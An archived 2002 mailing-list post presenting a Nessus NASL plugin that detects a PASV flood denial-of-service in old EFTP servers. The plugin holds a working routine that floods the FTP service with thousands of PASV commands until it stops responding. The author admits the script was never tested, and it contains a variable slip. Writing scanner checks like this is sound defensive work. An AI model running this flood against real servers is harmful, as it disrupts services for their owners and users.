EFTP PASV denial of service

To: plugins-writers_at_list.nessus.org
Subject: EFTP PASV denial of service
From: "Michel Arboi" <arboi_at_noos.fr>
Date: 14 Aug 2002 21:16:36 +0200

Old versions of EFTP are vulnerable to "PASV flood". I did not really
test this script, I do not have an old EFTP...

# This script was written by Michel Arboi <arboi_at_bigfoot.com>
#
# GPL
#

if(description)
{
 #script_id(11083);
 script_version ("$Revision$");
 
 name["english"] = "EFTP PASV DoS";
 name["francais"] = "Déni de service EFTP par PASV";
 
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "
The FTP server doesn't close the sockets that are allocated
with the PASV command. When too many ports are open, nobody
will be able to use passive mode anymore to transfer data.

An attacker may use this flaw to prevent you from 
publishing anything with FTP.

Solution : Contact your vendor for a fix.

Risk factor : Medium";
 

 desc["francais"] = "
Le serveur FTP distant ne ferme pas les sockets ouvertes
par la commande PASV. Quand trop de ports sont occupés, 
plus personne ne peut utiliser le mode passif pour transférer
des données.

Un pirate peut utiliser ce problème pour vous empêcher
de publier quoi que ce soit par ftp.

Solution: Contactez le vendeur pour obtenir un correctif

Facteur de risque : Moyen";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Saturate the remote FTP server by running many PASV commands";
 summary["francais"] = "Sature le serveur FTP distant en lancant beaucoup de commandes PASV";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
		francais:"Ce script est Copyright (C) 2002 Michel Arboi");
 family["english"] = "FTP";
 family["francais"] = "FTP";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "ftp_anonymous.nasl");
 script_require_ports("Services/ftp", 21);
 script_exclude_keys("ftp/false_ftp");
 exit(0);
}

# The script code starts here

function pasv_ko(socket)
{
 send(socket: socket, data: string("PASV\r\n"));
 r = recv(socket: soc, length: 1024);
 if (ereg(string: r, pattern: "^2[0-9][0-9] ")) return(0);
 return(1);
}

function ftp_quit(socket)
{
  send(socket: socket, data: string("QUIT\r\n"));
  close(socket);
}


if (safe_checks()) exit(0);

login = get_kb_item("ftp/login"); 
pass = get_kb_item("ftp/password");
if (!login) login="ftp";
if (!pass) pass="nessus_at_nessus.com";

port = get_kb_item("Services/ftp");
if(!port) port = 21;
if (! get_port_state(port)) exit(0);

soc = open_sock_tcp(port);
if(! soc) exit(0);

# NB: we might try to send PASV without authentication
# EFTP allows this!
r = ftp_log_in(socket: soc, user: login, pass: pass);

if (pasv_ko(socket: soc))
{
 ftp_quit(socket: soc);
 exit(0);
}

# Note: i<=5000 should be enough to kill EFTP, but 65535+ is not 
# enough to kill a sane server
for (i = 1024; i < 5001; i=i+1)
{
  if (pasv_ko(socket: soc))
  {
    display(string("Stopped at I=", i, "\n"));
    i=99999;
  }
}

ftp_quit(socket: soc);
#

soc = open_sock_tcp(port);
if(!soc)
{
  # The service died
  security_hole(port);
  exit(0);
}

if (pasv_ko(socket: soc)) security_hole(port);

ftp_quit(socket: soc);

Follow-Ups:
- Re: EFTP PASV denial of service
  - From: deraison_at_nessus.org

Previous by Date: Boozt AdBanner administration CGI overflow
Next by Date: Re: EFTP PASV denial of service
Previous by Thread: EFTP installation directory disclosure
Next by Thread: Re: EFTP PASV denial of service
Plugins-writers August 2002 archives indexes sorted by: [ thread ] [ subject ] [ author ] [ date ]
Plugins-writers list archive Table of Contents
More information about the Plugins-writers mailing list

This archive was generated by a fusion of Pipermail 0.09 (Mailman edition) and MHonArc 2.6.8.